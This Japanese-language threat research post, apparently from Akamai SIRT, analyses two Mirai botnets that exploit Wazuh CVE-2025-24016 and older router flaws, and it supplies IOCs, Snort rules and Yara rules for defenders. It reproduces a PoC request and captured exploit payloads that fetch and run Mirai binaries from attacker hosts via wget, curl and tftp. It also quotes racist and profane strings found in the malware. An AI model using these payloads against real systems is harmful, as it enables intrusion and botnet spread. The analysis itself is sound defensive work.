2 つのボットネットと、1 つの欠陥:Wazuh の脆弱性を介して Mirai が拡散
この調査における検出結果はすべて SIRT ハニーポットを介して収集されたものであり、Wazuh ソフトウェアを実行している実際の Wazuh 本番環境のエンドポイントで観察されたものではありません。
コンテンツに関する警告:この記事で言及されている攻撃者が使用する命名規則の一部には、人種差別的抽象と露骨な言葉が含まれています。教育および検出の目的上、これらの編集は行っていません。これらは、Akamai の価値観や見解を反映したものでは一切ございません。
エグゼクティブサマリー
Akamai Security Intelligence and Response Team(SIRT)は、Wazuh サーバー(CVSS 9.9)に対する、クリティカルなリモートコード実行(RCE)の脆弱性 CVE-2025-24016 が活発に悪用されていることを確認しました。
この脆弱性は、分散型 API(DAPI)リクエストを利用して、攻撃者がサニタイズされていない辞書をアップロードしてコードをリモートで実行できるようにします。
この脆弱性を悪用した Mirai 亜種による 2 つのキャンペーンを観測しました。そのうちの 1 つである「Resbot」は、ドメインにイタリア語の命名法が含まれており、影響を受けるデバイス所有者の対象地域や使用言語を示唆している可能性があります。
Akamai SIRT では、2025 年 3 月にハニーポットのグローバルネットワークで活動を最初に特定しました。この脆弱性が実際に悪用されたことが報告されたのは、2025 年 2 月に初めて公開されて以来、これが初めてです。
この脆弱性を悪用するボットネットは、CVE-2023-1389、CVE-2017-17215、CVE-2017-18368 などのいくつかの既知の脆弱性を利用しています。
このブログ記事の最後に、侵害の痕跡(IOC)のリストを掲載しています。この脅威に対する防御としてお役立てください。
概要
Akamai SIRT は、2025 年 3 月下旬に、インターネットに公開されているハニーポットのクラスタ全体で CVE-2025-24016 が実際に悪用を試みたことを観測しました。SIRT は、この脆弱性を利用して Mirai マルウェアの亜種を脆弱なターゲットシステムに拡散する 2 つの異なるボットネットを特定しました。
CVE-2025-24016 とは
2025 年 2 月に、CVE-2025-24016 はオープンソース XDR および SIEM ソリューション Wazuh のマネージャーパッケージで公開されました。バージョン 4.4.0 から 4.9.0 までの Wazuh に影響し、バージョン 4.9.1 のリリースで修正が適用されます。この脆弱性により、API アクセス権を持つリモート攻撃者は、悪意を持って作成された JSON ファイルを使用してターゲットサーバー上で任意のコードを実行できます。
Wazuh API では、DistributedAPI のパラメーターは JSON としてシリアライズされ、framework/wazuh/core/cluster/common.py ファイルで as_Wazuh_object を使用してデシリアライズされます。これは、サニタイズされていない辞書を DAPI リクエストに挿入することで悪用される可能性があり、任意の Python コードの評価につながる可能性があります。
2025 年 2 月下旬に、この脆弱性で RCE を実現する方法が概念実証(PoC)によって詳述されました。run_as エンドポイントを使用して RCE をトリガーすると、攻撃者が auth_context 引数を制御できるようになります。PoC では、作成者は /security/user/authenticate/run_as という URI に対する Burp Suite リクエストを使用してこれを実証しています(図 1)。
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-
encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
図 1:Burp Suite リクエスト(ソース:https://github.com/MuhammadWaseem29/CVE-2025-24016)
認証ヘッダーは Base64 でエンコードされており、悪性のペイロードには、任意の Python コード(このケースでは、exit)の実行をトリガーする、サニタイズされていない例外として __unhandled_exc__ が含まれています。
悪用の活発化
公開からわずか数週間後の 2025 年 3 月初めに、Akamai SIRT は自社のハニーポットのグローバルネットワークにおいて、Wazuh のこの脆弱性を悪用しようとする試みを発見しました。これは、かつてないほどに悪用までの時間が短縮された最新の事例で、ボットネットオペレーターが新たに公開された CVE を採用したものです。
Base64 エンコードされたヘッダー認証は、wazuh-wui:MyS3cr37P450r.*- にデコードされます。これは、PoC エクスプロイトの認証と同じです(図 2)。エンドポイントとリクエストの構造は PoC エクスプロイトと一致しますが、ここではマルウェアの拡散に使用されます。
/security/user/authenticate/run_as {"__unhandled_exc__":{"__args__":["wget http://176.65.134[.]62/w.sh -O /tmp/temp_script.sh || curl -o /tmp/temp_script.sh http://176.65.134[.]62/w.sh; sh /tmp/temp_script.sh"],"__class__":"os.system"}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
図 2:PoC と同じ悪用の試み #1
さらに、Akamai では 2025 年 5 月初旬にもエンドポイント /Wazuh を標的とする同様の構造化されたリクエストを検知しました。これは、この脆弱性の標準的なターゲットエンドポイントとは異なります(図 3)。リクエストは、エンドポイントを別として PoC とほぼ同じであるため、ボットネットは依然として同じ Wazuh の脆弱性を悪用しようとしている可能性があります。
/wazuh {"__unhandled_exc__": {"__class__": "os.system", "__args__": ["wget http://104.168.101[.]27/sh -O- | sh"]}}
Header Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
図 3:PoC とは異なる悪用の試み #2
ボットネット 1:複数の Mirai 亜種
実際に悪用が確認された Wazuh のこの脆弱性は、2 つの異なるボットネットに接続されています。最初のボットネットは、2025 年 3 月初旬の最初の試みに接続されています。このエクスプロイトでは、メインの Mirai マルウェアペイロードのダウンローダーとして機能する悪性のシェルスクリプトをフェッチして実行します(図 4)。Mirai でよく見られる平均的なシェルスクリプトと同様に、主に IoT(モノのインターネット)デバイスをターゲットとするために、さまざまなアーキテクチャをサポートしています。
"busybox wget http://176.65.134[.]62/bins/morte.arm; chmod 777 morte.arm; ./morte.arm morte.arm",
"busybox wget http://176.65.134[.]62/bins/morte.arm5; chmod 777 morte.arm5; ./morte.arm5 morte.arm5",
"busybox wget http://176.65.134[.]62/bins/morte.arm6; chmod 777 morte.arm6; ./morte.arm6 morte.arm6",
"busybox wget http://176.65.134[.]62/bins/morte.arm7; chmod 777 morte.arm7; ./morte.arm7 morte.arm7",
"busybox wget http://176.65.134[.]62/bins/morte.i686; chmod 777 morte.i686; ./morte.i686 morte.i686",
"busybox wget http://176.65.134[.]62/bins/morte.m68k; chmod 777 morte.m68k; ./morte.m68k morte.m68k",
"busybox wget http://176.65.134[.]62/bins/morte.mips; chmod 777 morte.mips; ./morte.mips morte.mips",
"busybox wget http://176.65.134[.]62/bins/morte.mpsl; chmod 777 morte.mpsl; ./morte.mpsl morte.mpsl",
"busybox wget http://176.65.134[.]62/bins/morte.ppc; chmod 777 morte.ppc; ./morte.ppc morte.ppc",
"busybox wget http://176.65.134[.]62/bins/morte.sh4; chmod 777 morte.sh4; ./morte.sh4 morte.sh4",
"busybox wget http://176.65.134[.]62/bins/morte.spc; chmod 777 morte.spc; ./morte.spc morte.spc",
"busybox wget http://176.65.134[.]62/bins/morte.x86; chmod 777 morte.x86; ./morte.x86 morte.x86",
"busybox wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x64",
"rm $0"
図 4:w.sh シェルスクリプトの内容
「morte」という名前の Mirai マルウェアのサンプルは、しばらく前から存在していた LZRD Mirai の亜種です。これらは、実行時にターゲットマシンのコンソールに出力されるハードコードされた一意の文字列によって簡単に識別できます。つまり「lzrd here」です。
観測された関連ドメイン
176.65.134[.]62 の IP アドレスを調べると、nuklearcnc.duckdns[.]org のコマンド & コントロール(C2)ドメインに解決されました。Duck DNS は動的 DNS サーバーであり、ここではこの特定のサブドメインのみが悪性のものであることに注意してください。
このドメインも同様の時間枠で 176.65.142.252 に解決されました。この IP は cbot.galaxias[.]cc という別の C2 ドメインに解決されました。VirusTotal を使用すると、Windows の svchost プロセスを装った Windows ベースの RAT と思われるものが検出され、C2 の cbot.galaxias[.]cc サブドメインにビーコンを戻すことができました。
もう 1 つのサブドメイン neon.galaxias[.]cc には、より標準的な Mirai 亜種らしき分布とそれに関連する通信が含まれていました。また、それを解決した IP アドレスの 1 つである 209.141.34[.]106 も、pangacnc[.]com と jimmyudp-raw[.]xyz という 2 つの C2 ドメインに解決されています。
jimmyudp-raw[.]xyz ドメインには、VirusTotal 上に 3 つの異なる名前の Mirai マルウェアサンプルがありました。1 つ目は「neon」と呼ばれる未確認の Mirai 亜種で、C2 通信用のポート 80 を介して 65.222.202[.]53 に接続され、ハードコードされたコンソール文字列「fuck u nigga」が含まれています。
2 つ目は「k03ldc」と呼ばれ、V3G4 Mirai バリアントの修正またはアップグレードバージョンであると思われます。ハードコードされたコンソール文字列「666V3G4-Katana999」を含み、C2 通信用のポート 36063 を介して 196.251.86[.]49 に接続されています。
最後に、「KKveTTgaAAsecNNaaaa」と呼ばれる 3 つ目のサンプルは、オリジナルの V3G4 Mirai 亜種です。このマルウェアは、C2 通信用のポート 60195 を介して 209.141.34[.]106 に接続し、感染時にハードコードされた文字列「xXxSlicexXxxVEGA」を使用します。ターゲットマシンがすでに V3G4 亜種に感染しているかどうかを認識し、感染している場合は、通常のプリントではなく、「We got this shit already」とプリントします。
pangacnc[.]com ドメインには、VirusTotal 上に 2 つの異なる名前の Mirai マルウェアサンプルがありました。1 つは「KKveTTgaAAsecNNaaaa」という名前のマルウェアで、これは前述のマルウェアと同じです。もう 1 つは「vision」という名前の LZRD Mirai 亜種で、他の C2 ドメインの「neon」サンプルと同様に、ポート 80 を介して 65.222.202[.]53 に接続します。これは、「neon」という名前の Mirai マルウェアが LZRD 亜種の修正バージョンである可能性を示しています。
悪用される脆弱性の増加
Wazuh RCE を標的とするだけでなく、このボットネットが他のさまざまな既知の脆弱性を悪用しようとしていることが観測されました。これには、悪用されていることを Akamai が観測した複数の脆弱性(図 5、図 6、図 7)が含まれていました。これらの脆弱性については前回のブログ記事に記載しています。
/ws/v1/cluster/apps {"application-id": "application_1404198295326_0003", "application-name": "get-shell", "am-container-spec": {"commands": {"command": "wget http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64; curl -O http://176.65.134[.]62/bins/morte.x64; chmod 777 morte.x64; ./morte.x64 morte.x86_64; rm -rf morte.x64"}}, "application-
図 5:Hadoop YARN の脆弱性
/cgi-bin/luci/;stok=/locale?form=country operation=write&country=$(id>cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://176.65.134[.]62/update.sh; curl -O http://176.65.134[.]62/update.sh; chmod 777 update.sh; sh update.sh; tftp 176.65.134[.]62 -c get tupdate.sh; chmod 777 tupdate.sh; sh tupdate.sh; tftp -r tupdate2.sh -g 176.65.134[.]62; chmod 777 tupdate2.sh; sh tupdate2.sh; ftpget -v -u anonymous -p anonymous -P 21 176.65.134[.]62 update1.sh update1.sh; sh update1.sh; rm -rf update.sh tupdate
図 6:TP-Link Archer AX21 コマンドインジェクション(https://nvd.nist.gov/vuln/detail/cve-2023-1389 を参照)
/manager_dev_ping_t.gch cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://209.141.34[.]106/1.sh; curl -O http://209.141.34[.]106/1.sh; chmod 777 1.sh; sh 1.sh; tftp 209.141.34[.]106 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 209.141.34[.]106; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 209.141.34[.]106 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3
図 7:ZTE ZXV10 H108L ルーターの RCE 悪用(https://github.com/stasinopoulos/ZTExploit/blob/master/ZTExploit_Source/ztexploit.py を参照)
ボットネット 2:Resbot/Resentual ボットネット
2 つ目のボットネットは、2025 年 5 月初旬の /Wazuh エンドポイントでの試みから特定されました。最初のエクスプロイトと同様に、このボットネットも Mirai ダウンローダーとして機能する悪性のシェルスクリプトをフェッチして実行します。「resgod」という名前のマルウェアは、「Resentual got you!」というハードコードされたコンソール文字列によって識別されます。また、最初のボットネットと同様に、ペイロードは IoT デバイスをターゲットとするさまざまなアーキテクチャを標的にしています。
興味深いのは、このボットネットに関連付けられている言語です。さまざまなドメインを使用して、イタリア語の命名法を持つマルウェアを拡散していました。たとえば、「gestisciweb.com」といったドメインは、おおまかに訳すと「manage web」となります。
これらは、C2 の「resbot.online」(悪性のドメインであることがより明らか)よりも正規のドメイン名に見えやすいことから、フィッシング攻撃によく使用される悪性のドメイン名と似ています。この言語的な命名規則は、特にイタリア語を話すユーザーが所有、実行しているデバイスを標的としたキャンペーンであることを示している可能性があります。
サンプル内の文字列は暗号化されていないように見え、他のさまざまなスキャン機能とエクスプロイトが表示されます。104.168.101[.]27 IP アドレスはマルウェアにハードコードされており、TCP ポート 62627(C2 ポートの 1 つ)を介して C2 サーバーとして使用されます。さらに、このボットネットはポート 21 を介して FTP 経由で拡散し、Telnet スキャンを実行しようとします。
図 8、図 9、図 10、図 11 に、ハードコードされたさまざまなエクスプロイトを示します。
POST /ctrlt/DeviceUpgrade_1 HTT
P/1.1\r\nContent-Length: 440\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthori
zation: Digest username="dslf-config", realm="HuaweiHomeGateway",
nonce="88645ce
fb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1",
response="3612f843a42d
b38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001,
cnonce="248d1a2
560100669"\r\n\r\n<?xml version="1.0" ?><s:Envelope
xmlns:s="http://schemas.xmls
oap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encodin
g/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-
org:service:WANPPPConnection:1"
><NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r
/resgod.mips
; /bin/busybox chmod +x /tmp/.kx; /tmp/.kx selfrep.huawei)</NewStatusURL>.
<NewDow
nloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade>.
</s:Body></s:Envelope>\r
\n\r\n\r\n
図 8:Huawei HG532 ルーター RCE(https://nvd.nist.gov/vuln/detail/cve-2017-17215 参照)
POST /picsdesc.xml HTTP/1.1\r\nContent-Length: 630\r\nAccept-Encoding: gzip, deflate\r\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\r\nAccept: /\r\nUser-Agent: Hello-World\r\nConnection: keep-alive\r\n\r\n<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://104.168.101[.]27/resgod.mips; chmod 777 resgod.mips; ./resgod.mips selfrep.realtek</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>\r\n\r\n
図 9:Realtek SDK Miniigd UPnP SOAP RCE(https://www.google.com/url?q=https://nvd.nist.gov/vuln/detail/cve-2014-8361&sa=D&source=docs&ust=1748461205172738&usg=AOvVaw2FtzN61mQxXkxEWnb9gb05 参照)
POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: r00ts3c-owned-you\r\nContent-Length: 176\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://104.168.101[.]27/resgod.arm7;chmod+777+resgodarm7;./resgodarm7;rm+-rf+resgod.arm7%3b%23&remoteSubmit=Save\r\n\r\n
図 10:TrueOnline ZyXEL P660HN-T v1 ルーター・コマンド・インジェクション(https://nvd.nist.gov/vuln/detail/cve-2017-18368 参照)
&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=$(echo -e "wget http://104.168.101[.]27/sh" >> /tmp/.res) HTTP/1.0
図 11:FTP 経由での拡散
結論
Mirai の拡散は、古いソースコードに少し手を加えて再利用すれば新しいボットネットの設定や作成は簡単であることから、比較的減衰することなく続いています。ボットネットオペレーターは、新たに公開された脆弱性の悪用を利用するだけで、成功を収められることがしばしばあります。
CVE プログラムは、全体としては業界にとって利益をもたらしますが、光を当てなければ不正を働く攻撃者が見過ごしていたかもしれない脆弱性が浮き彫りになるため、諸刃の剣となる可能性もあります。
研究者たちは、PoC を作成することで脆弱性の重要性について組織に教育を提供しようと試みたものの、パッチのリリース時に遅れを取らずに対応することがどれだけ重要であるかを示しただけで、依然として有害な結果が引き起こされています。ボットネットオペレーターは、これらの脆弱性の開示の一部を把握しています。特に、PoC が利用可能になった場合は、ボットネットが急増するように PoC コードを迅速に適応させることができます。
最近報告された脆弱性(使われなくなったデバイスにのみ影響を与える)とは異なり、CVE-2025-24016 は、古いバージョンを実行しているアクティブな Wazuh サーバーに影響を与えるため、注意が必要です。Wazuh バージョン 4.9.1 以降に含まれる修正プログラムを適用することを強くお勧めします。最新バージョンにパッチを適用することで、セキュリティの問題を解消することができます。Wazuh は、システムを適切に保護する方法についてのガイダンスを発行しています。このガイダンスに従えば、このキャンペーンは問題を引き起こさないはずです。
お気軽にお問い合わせください
IOC
Snort ルールおよび Yara ルールと併せて、IOC のリストを確認できます。防御担当者のサポートにお役立てください。
ネットワーク IOC の Snort ルール
C2 IP の Snort ルール(ボットネット #1)
alert ip any any -> [209.141.34.106, 176.65.142.137, 65.222.202.53, 196.251.86.49, 176.65.134.62] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000001;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
C2 ドメイン解決検知のための Snort ルール(ボットネット #1)
alert http any any -> [nuklearcnc.duckdns.org, jimmyudp-raw.xyz, pangacnc.com, neon.galaxias.cc, cbot.galaxias.cc] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000002; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
C2 IP の Snort ルール(ボットネット #2)
alert ip any any -> [104.168.101.27, 104.168.101.23, 79.124.40.46, 194.195.90.179] any (
msg:"Possible Botnet C2 Infrastructure Activity - Suspicious IP";
sid:2000003;
rev:1;
threshold:type limit, track by_src, count 1, seconds 600;
classtype:trojan-activity;
metadata:service http, malware;
)
C2 ドメイン解決検知のための Snort ルール(ボットネット #2)
alert http any any -> [resbot.online, versioneonline.com, web-app-on.com, assicurati-con-linear.online, webdiskwebdisk.webprocediweb.com, continueoraweb.com, ora-0-web.com, adesso-online.com, multi-canale.com, eversioneweb.com, gestisciweb.com] any (
msg:"Possible Botnet C2 or Malware Distribution - Suspicious Domain";
sid:2000004; rev:1;
classtype:trojan-activity;
metadata:service http, malware;
)
マルウェアサンプルの Yara ルール(ボットネット #1)
rule Mirai_Malware_IOCs_1
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware"
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$lzrd = "LZRD"
$fucku = "fuck u nigga"
$vega = "xXxSlicexXxxVEGA"
$we_got_this = "We got this shit already"
$katana = "666V3G4-Katana999"
$ip1 = "209.141.34.106"
$ip2 = "176.65.142.137"
$ip3 = "65.222.202.53"
$ip4 = "196.251.86.49"
$ip5 = “176.65.134.62”
$domain1 = "nuklearcnc.duckdns.org"
$domain2 = "jimmyudp-raw.xyz"
$domain3 = "pangacnc.com"
$domain4 = "neon.galaxias.cc"
$domain5 = "cbot.galaxias.cc"
$hash1 = "dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9"
$hash2 = "7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549"
$hash3 = "64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f"
$hash4 = "4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed"
$hash5 = "811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc"
$hash6 = "90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353"
$hash7 = "8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6"
$hash8 = "c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1"
$hash9 = "6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a"
condition:
(
$lzrd or
$fucku or
$vega or
$we_got_this or
$katana or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$ip5 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6 or
$hash7 or
$hash8 or
$hash9
)
}
マルウェアサンプルの Yara ルール(ボットネット #2)
rule Mirai_Malware_IOCs_2
{
meta:
description = "Detects files containing IOCs associated with potential Mirai malware."
author = "Akamai SIRT"
date = "2025-05-16"
source = "Akamai SIRT"
malware_family = "Mirai"
version = "1.0"
strings:
$resentual = "Resentual got you"
$ip1 = "104.168.101.27"
$ip2 = "104.168.101.23"
$ip3 = "79.124.40.46"
$ip4 = "194.195.90.179"
$domain1 = "resbot.online"
$domain2 = "versioneonline.com"
$domain3 = "web-app-on.com"
$domain4 = "Assicurati-con-linear.online"
$domain5 = "webdiskwebdisk.webprocediweb.com"
$domain6 = "continueoraweb.com"
$domain7 = "ora-0-web.com"
$domain8 = "adesso-online.com"
$domain9 = "multi-canale.com"
$domain10 = "eversioneweb.com"
$domain11 = "gestisciweb.com"
$hash1 = "9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b"
$hash2 = "be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0"
$hash3 = "e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0"
$hash4 = "4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6"
$hash5 = "a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc"
$hash6 = "941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549"
condition:
(
$resentual or
$ip1 or
$ip2 or
$ip3 or
$ip4 or
$domain1 or
$domain2 or
$domain3 or
$domain4 or
$domain5 or
$domain6 or
$domain7 or
$domain8 or
$domain9 or
$domain10 or
$domain11 or
$hash1 or
$hash2 or
$hash3 or
$hash4 or
$hash5 or
$hash6
)
}
悪性の IPv4 アドレス(ボットネット #1)
209.141.34.106
176.65.142.137
65.222.202.53
196.251.86.49
176.65.134.62
悪性のドメイン(ボットネット #1)
nuklearcnc.duckdns[.]org
jimmyudp-raw[.]xyz
pangacnc[.]com
neon.galaxias[.]cc
cbot.galaxias[.]cc
悪性の IPv4 アドレス(ボットネット #2)
104.168.101.27
104.168.101.23
79.124.40.46
194.195.90.179
悪性のドメイン(ボットネット #2)
resbot[.]online
versioneonline[.]com
web-app-on[.]com
Assicurati-con-linear[.]online
webdiskwebdisk.webprocediweb[.]com
continueoraweb[.]com
ora-0-web[.]com
adesso-online[.]com
multi-canale[.]com
eversioneweb[.]com
gestisciweb[.]com
SHA256 ハッシュ(ボットネット #1)
dece5eaeb26d0ca7cea015448a809ab687e96c6182e56746da9ae4a2b16edaa9
7b659210c509058bd5649881f18b21b645acb42f56384cbd6dcb8d16e5aa0549
64bd7003f58ac501c7c97f24778a0b8f412481776ab4e6d0e4eb692b08f52b0f
4c1e54067911aeb5aa8d1b747f35fdcdfdf4837cad60331e58a7bbb849ca9eed
811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc
90df78db1fb5aea6e21c3daca79cc690900ef8a779de61d5b3c0db030f4b4353
8a58fa790fc3054c5a13f1e4e1fcb0e1167dbfb5e889b7c543d3cdd9495e9ad6
c9df0a2f377ffab37ede8f2b12a776a7ae40fa8a6b4724d5c1898e8e865cfea1
6614545eec64c207a6cc981fccae8077eac33a79f286fc9a92582f78e2ae243a
SHA256 ハッシュ(ボットネット #2)
9d5c10c7d0d5e2ce8bb7f1d4526439ce59108b2c631dd9e78df4e096e612837b
be4070b79a2f956e686469b37a8db1e7e090b9061d3dce73e3733db2dbe004f0
e6cf946bd5a17909ae3ed9b1362cfaafa7afe02e74699dcbc3d515a6f964b0b0
4d9f632e977b16466b72b6ee90b6de768c720148c1e337709b57ca49c1cdffb6
a0b47c781e70877ad4e721ba49f64fc0bc469e38750f070a232d12f03d9990bc
941a30698db98f29919cba80e66717c25592697b1447f3e96825730229d97549